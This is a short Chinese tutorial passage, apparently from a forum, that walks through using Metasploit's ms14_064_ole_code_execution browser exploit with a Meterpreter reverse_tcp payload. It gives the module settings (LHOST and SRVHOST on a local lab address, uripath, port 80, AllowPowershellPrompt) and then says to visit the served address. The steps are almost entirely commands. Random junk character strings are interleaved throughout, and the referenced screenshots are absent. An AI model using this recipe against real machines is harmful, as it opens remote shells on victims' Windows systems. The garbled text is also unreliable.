: P8 O. f" X0 T+ s. e
我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示
" Z2 m2 F1 \: Z# q+ W
: f5 O! S# f2 Q% g* B9 S
) K/ X: T- E# e. t
开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图:
]5 L& m4 [$ h* ?4 O H
6 i) `5 m2 k; |8 {6 q* F+ w
) Z; v' |0 I; q2 v7 |3 N8 M! d) Z% B 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp% H! l* k- Z- h& X5 c5 K
0 D! Q" C ?/ |- i
5 h* W% r7 h% \7 A
set AllowPowershellPrompt true6 Q8 u* I( t% T8 r' {* u
* i& ]# M1 W( b5 f1 e# J6 Y
) h% t' L0 B( z* c( d& P
Set LHOST 192.168.0.109
/ s9 b0 u0 ?5 K/ q5 o0 O+ h. W
W5 A8 R: c- ?
9 W3 s- c; J; ?7 \
set SRVHOST 192.168.0.109
5 @& [3 b# y; n& X
3 @% R& `+ J2 {/ A/ F) R6 \6 i5 a9 ~" N+ C( } @* K' H5 X) _1 I
Set uripath share5 m0 p1 d- a7 _1 d2 q2 h3 Y
3 P2 O. T& R$ u/ h; L7 B) T+ T& m( X
& s# k, m C* R! a7 s
Set srvport 803 j/ ]0 j7 U) O$ U; i/ s
) C6 L. E) k8 K$ O
: {/ q4 O3 t4 J2 q! V C( F% p
1 E6 s& P3 U. Z7 Z( Z
8 ^2 M. x7 M1 } t9 v- ~
) g% f2 m# }+ S6 R1 ^4 U
9 N% t+ j" s, \; Y1 R
( |/ }8 Y/ q/ s
4 K, ~; \' o. Q% P
; W4 X" H. g3 u9 S9 o2 b& O. [' f
1 S/ p' V$ ?/ E0 |" g/ \& e( g1 i% x' y8 q8 f
4 d% S8 Z$ N5 W0 P) f/ X5 i
% Q2 j' b" w# i4 W" x8 i ?
2 t7 H: g- B( m6 l) e3 _2 K2 f
+ x' X9 G. A3 a6 j# h6 f. ~) Z' c* {' Z
( ?6 Z) v5 t+ \1 d7 i
5 u% ?% y3 h) [2 e/ ]; z6 @ 下面我们来访问本地地址如图:' t. _4 V8 |$ S$ R0 z, m# @
* h1 Z! h: |9 M! T8 F8 D* V8 d
% ]: T( L% s9 K 0 u4 d+ b+ w5 b' `
# \& I: B, z/ O
; j& f$ L. O. x6 S, h( g* e) p Z# w; V" |, B2 v9 c
d' m8 ~2 U) ]% U9 e* k6 @* N/ \5 w: P. n9 H7 Z# g( X
" j0 U7 f( H# m# ~